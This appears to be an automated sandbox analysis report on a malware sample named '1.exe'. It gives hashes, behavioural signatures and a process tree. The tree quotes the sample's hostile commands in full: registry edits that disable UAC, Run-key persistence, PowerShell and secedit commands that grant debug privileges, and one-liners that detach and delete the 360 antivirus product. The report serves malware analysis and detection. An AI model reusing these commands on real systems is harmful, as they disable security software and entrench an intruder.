Overview
overview
10Static
static
10010df829b9...28.exe
windows7-x64
10010df829b9...28.exe
windows10-2004-x64
101.exe
windows7-x64
101.exe
windows10-2004-x64
101d730b2a86...84.exe
windows7-x64
71d730b2a86...84.exe
windows10-2004-x64
71f4559c246...c1.exe
windows7-x64
101f4559c246...c1.exe
windows10-2004-x64
10265c128a8a...2f.exe
windows7-x64
10265c128a8a...2f.exe
windows10-2004-x64
1049432b3c21...b4.exe
windows7-x64
1049432b3c21...b4.exe
windows10-2004-x64
1054fa454476...b1.exe
windows7-x64
1054fa454476...b1.exe
windows10-2004-x64
1066e68902e9...68.exe
windows7-x64
1066e68902e9...68.exe
windows10-2004-x64
10820a177b58...5f.exe
windows7-x64
10820a177b58...5f.exe
windows10-2004-x64
108d5514730f...d4.exe
windows7-x64
108d5514730f...d4.exe
windows10-2004-x64
1093e14db4af...0c.exe
windows7-x64
1093e14db4af...0c.exe
windows10-2004-x64
109770fde1f1...18.exe
windows7-x64
69770fde1f1...18.exe
windows10-2004-x64
6App_Dev_Details.xlsm
windows7-x64
6App_Dev_Details.xlsm
windows10-2004-x64
6Celery.exe
windows7-x64
7Celery.exe
windows10-2004-x64
7a563257161...10.xls
windows7-x64
3a563257161...10.xls
windows10-2004-x64
1crss.exe
windows7-x64
7crss.exe
windows10-2004-x64
9Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 18:12
Behavioral task
behavioral1
Sample
010df829b95529730aa0840699e780b9176822dbefc24864ccc134a790043a28.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
010df829b95529730aa0840699e780b9176822dbefc24864ccc134a790043a28.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
1d730b2a86c3c18be5d1fe22ee0fdd869d6ca4e01da70f53dd5722619a61b184.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
1d730b2a86c3c18be5d1fe22ee0fdd869d6ca4e01da70f53dd5722619a61b184.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
1f4559c2464e25078e6f0ae6b99990b6607c5adc0d631d43ba380ae7de51f0c1.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
1f4559c2464e25078e6f0ae6b99990b6607c5adc0d631d43ba380ae7de51f0c1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
265c128a8a9421847dea2121ae5ce79efb601616c4fd060ff9863f4c2c498c2f.exe
Resource
win7-20241023-en
Behavioral task
behavioral10
Sample
265c128a8a9421847dea2121ae5ce79efb601616c4fd060ff9863f4c2c498c2f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
66e68902e968ac5c762b7d4950df70b2ef8125d38d6884ff9e37e72542e47b68.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
66e68902e968ac5c762b7d4950df70b2ef8125d38d6884ff9e37e72542e47b68.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
820a177b585f0a50c430e1b2ac66467cda0d96eb80b8e39ddf23079c8f2c685f.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
820a177b585f0a50c430e1b2ac66467cda0d96eb80b8e39ddf23079c8f2c685f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
8d5514730f330a6f4ae9b1807f0c77ed15975d469c7c92c10c690ed681210ed4.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
8d5514730f330a6f4ae9b1807f0c77ed15975d469c7c92c10c690ed681210ed4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
93e14db4af6b127444c9349f6c9162f4eebba4c220378be18d63f9951cb63b0c.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
93e14db4af6b127444c9349f6c9162f4eebba4c220378be18d63f9951cb63b0c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
9770fde1f1e7fd98bedf06daa29c7451f52ad1719a0d606343846c73b34e8218.exe
Resource
win7-20241023-en
Behavioral task
behavioral24
Sample
9770fde1f1e7fd98bedf06daa29c7451f52ad1719a0d606343846c73b34e8218.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
App_Dev_Details.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
App_Dev_Details.xlsm
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
Celery.exe
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
Celery.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
a563257161e5c3947e4ea5669e1ef5eafbe67d5049816de47313ada6f299ac10.xls
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
a563257161e5c3947e4ea5669e1ef5eafbe67d5049816de47313ada6f299ac10.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
crss.exe
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
crss.exe
Resource
win10v2004-20241007-en
General
-
Target
1.exe
-
Size
7.8MB
-
MD5
37f147e176952471079d4c8065fb6e00
-
SHA1
9e93d4c945c28fe61e2182e0d10e0934463a0ea6
-
SHA256
c981db0ed18cd58ec4c2f7a6f80d3e49999fbdde290ace3e4b54513d8174a8e3
-
SHA512
577af208371ba1501278c9cdec7fca689fdba5be60695a9009ab5bbae790a5936d65b1ed3af46a85c9343f876a66400f0786c49d58dc0d3c094245237d395763
-
SSDEEP
98304:MPZYxnMe4V/cJtKpGvJc5twG9Nh0AA/Sxrn4l8aC98YRO40kMMT1hxUdjX:lxMe4cxhAj48QYgqdUV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" iusb3mon.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ iusb3mon.exe -
pid Process 904 powershell.exe 1284 powershell.exe 2856 powershell.exe 320 powershell.exe 548 powershell.exe 1592 powershell.exe 1496 powershell.exe 2864 powershell.exe 752 powershell.exe 1984 powershell.exe 236 powershell.exe 2784 powershell.exe 608 powershell.exe 1488 powershell.exe 3004 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iusb3mon.exe -
Executes dropped EXE 4 IoCs
pid Process 2380 irsetup.exe 1180 Process not Found 2564 un.exe 3036 iusb3mon.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine iusb3mon.exe -
Loads dropped DLL 5 IoCs
pid Process 880 1.exe 2380 irsetup.exe 1180 Process not Found 2380 irsetup.exe 2380 irsetup.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3036 iusb3mon.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 1284 powershell.exe 1496 powershell.exe 236 powershell.exe 548 powershell.exe 320 powershell.exe 1592 powershell.exe 904 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iusb3mon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz iusb3mon.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2868 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 2380 irsetup.exe 3036 iusb3mon.exe 904 powershell.exe 1284 powershell.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 1496 powershell.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 1984 powershell.exe 752 powershell.exe 2856 powershell.exe 2864 powershell.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 236 powershell.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 548 powershell.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe 3036 iusb3mon.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 236 powershell.exe Token: SeDebugPrivilege 548 powershell.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2380 irsetup.exe 2380 irsetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 880 wrote to memory of 2380 880 1.exe 30 PID 880 wrote to memory of 2380 880 1.exe 30 PID 880 wrote to memory of 2380 880 1.exe 30 PID 2380 wrote to memory of 2564 2380 irsetup.exe 31 PID 2380 wrote to memory of 2564 2380 irsetup.exe 31 PID 2380 wrote to memory of 2564 2380 irsetup.exe 31 PID 2380 wrote to memory of 3036 2380 irsetup.exe 33 PID 2380 wrote to memory of 3036 2380 irsetup.exe 33 PID 2380 wrote to memory of 3036 2380 irsetup.exe 33 PID 2380 wrote to memory of 3036 2380 irsetup.exe 33 PID 2380 wrote to memory of 904 2380 irsetup.exe 34 PID 2380 wrote to memory of 904 2380 irsetup.exe 34 PID 2380 wrote to memory of 904 2380 irsetup.exe 34 PID 2380 wrote to memory of 1284 2380 irsetup.exe 36 PID 2380 wrote to memory of 1284 2380 irsetup.exe 36 PID 2380 wrote to memory of 1284 2380 irsetup.exe 36 PID 2380 wrote to memory of 1496 2380 irsetup.exe 38 PID 2380 wrote to memory of 1496 2380 irsetup.exe 38 PID 2380 wrote to memory of 1496 2380 irsetup.exe 38 PID 3036 wrote to memory of 2864 3036 iusb3mon.exe 40 PID 3036 wrote to memory of 2864 3036 iusb3mon.exe 40 PID 3036 wrote to memory of 2864 3036 iusb3mon.exe 40 PID 3036 wrote to memory of 2864 3036 iusb3mon.exe 40 PID 3036 wrote to memory of 2856 3036 iusb3mon.exe 41 PID 3036 wrote to memory of 2856 3036 iusb3mon.exe 41 PID 3036 wrote to memory of 2856 3036 iusb3mon.exe 41 PID 3036 wrote to memory of 2856 3036 iusb3mon.exe 41 PID 3036 wrote to memory of 752 3036 iusb3mon.exe 42 PID 3036 wrote to memory of 752 3036 iusb3mon.exe 42 PID 3036 wrote to memory of 752 3036 iusb3mon.exe 42 PID 3036 wrote to memory of 752 3036 iusb3mon.exe 42 PID 3036 wrote to memory of 1984 3036 iusb3mon.exe 44 PID 3036 wrote to memory of 1984 3036 iusb3mon.exe 44 PID 3036 wrote to memory of 1984 3036 iusb3mon.exe 44 PID 3036 wrote to memory of 1984 3036 iusb3mon.exe 44 PID 3036 wrote to memory of 1064 3036 iusb3mon.exe 45 PID 3036 wrote to memory of 1064 3036 iusb3mon.exe 45 PID 3036 wrote to memory of 1064 3036 iusb3mon.exe 45 PID 3036 wrote to memory of 1064 3036 iusb3mon.exe 45 PID 2380 wrote to memory of 236 2380 irsetup.exe 50 PID 2380 wrote to memory of 236 2380 irsetup.exe 50 PID 2380 wrote to memory of 236 2380 irsetup.exe 50 PID 1984 wrote to memory of 1660 1984 powershell.exe 52 PID 1984 wrote to memory of 1660 1984 powershell.exe 52 PID 1984 wrote to memory of 1660 1984 powershell.exe 52 PID 1984 wrote to memory of 1660 1984 powershell.exe 52 PID 2856 wrote to memory of 1720 2856 powershell.exe 53 PID 2856 wrote to memory of 1720 2856 powershell.exe 53 PID 2856 wrote to memory of 1720 2856 powershell.exe 53 PID 2856 wrote to memory of 1720 2856 powershell.exe 53 PID 752 wrote to memory of 2500 752 powershell.exe 54 PID 752 wrote to memory of 2500 752 powershell.exe 54 PID 752 wrote to memory of 2500 752 powershell.exe 54 PID 752 wrote to memory of 2500 752 powershell.exe 54 PID 2864 wrote to memory of 1744 2864 powershell.exe 55 PID 2864 wrote to memory of 1744 2864 powershell.exe 55 PID 2864 wrote to memory of 1744 2864 powershell.exe 55 PID 2864 wrote to memory of 1744 2864 powershell.exe 55 PID 2380 wrote to memory of 548 2380 irsetup.exe 56 PID 2380 wrote to memory of 548 2380 irsetup.exe 56 PID 2380 wrote to memory of 548 2380 irsetup.exe 56 PID 3036 wrote to memory of 2784 3036 iusb3mon.exe 58 PID 3036 wrote to memory of 2784 3036 iusb3mon.exe 58 PID 3036 wrote to memory of 2784 3036 iusb3mon.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" iusb3mon.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe"C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5660018 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\1.exe" "__IRCT:2" "__IRTSS:0" "__IRSID:S-1-5-21-1488793075-819845221-1497111674-1000"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\ProgramData\Data\un.exe"C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\3⤵
- Executes dropped EXE
PID:2564
-
-
C:\ProgramData\Program\iusb3mon.exe"C:\ProgramData\Program\iusb3mon.exe" false3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:1720
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:2500
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:1064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
